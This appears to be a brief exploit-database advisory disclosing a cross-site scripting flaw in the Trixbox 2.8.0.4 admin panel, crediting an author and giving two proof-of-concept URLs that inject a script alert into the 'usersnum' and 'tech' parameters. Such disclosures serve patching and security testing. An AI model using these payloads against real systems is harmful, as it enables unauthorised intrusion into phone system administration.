Trixbox version 2.8.0.4 suffers from a cross site scripting vulnerability.
ac5debdefb1713dc35b3a6547af2cb9057024a951ff7e65c23b7c5901c7dc96f
Exploit Title: Trixbox 2.8.0.4 XSS Exploit
Date: 07/04/2014
Exploit Author: Daniel Moreno (a.k.a W1ckerMan)
Vendor Homepage: http://sourceforge.net/projects/asteriskathome/
Version: 2.8.0.4
This exploit needs authentication
http://IP/admin/config.php?display=recordings&usersnum=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://IP/admin/config.php?display=trunks&tech=%22%3E%3Cscript%3Ealert%28%22123%22%29%3C/script%3E
Thanx,
Daniel Henrique Negri Moreno (a.k.a W1ckerMan)